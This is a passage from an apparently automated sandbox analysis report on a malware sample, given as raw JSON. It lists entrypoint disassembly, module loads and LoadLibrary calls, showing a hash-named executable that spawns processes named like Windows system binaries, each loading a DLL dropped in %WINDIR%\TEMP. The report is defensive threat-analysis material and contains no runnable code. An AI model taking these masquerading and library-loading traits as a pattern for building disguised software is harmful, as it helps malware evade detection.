[eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"KERNEL32\" at base 76480000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d1f0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"DWMAPI.DLL\" at base 74270000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"SHELL32.DLL\" at base 76560000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"OLE32.DLL\" at base 77590000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"USER32\" at base 763b0000\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 76480000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74130000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 75570000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 74270000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 76560000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 77590000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"D3_08.exe\" loaded module \"USER32\" at base 763b0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76480000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d1f0000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 74270000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76560000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 77590000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 763b0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76480000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76560000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 77590000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 763b0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d1f0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74130000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75570000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76480000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74130000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75570000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74270000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76560000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 77590000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 763b0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d1f0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76480000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76560000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 77590000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 763b0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76480000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d1f0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76560000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 77590000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 763b0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712c0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76480000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d1f0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74130000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76120000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75570000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 762e0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74270000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76480000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76560000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 77590000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 772a0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74420000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76480000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 771b0000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"SMSS.EXE\" loaded module \"USER32\" at base 763b0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d1f0000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75570000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75570000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75570000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74130000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006008)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002452)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003452)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003452)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003996)\n 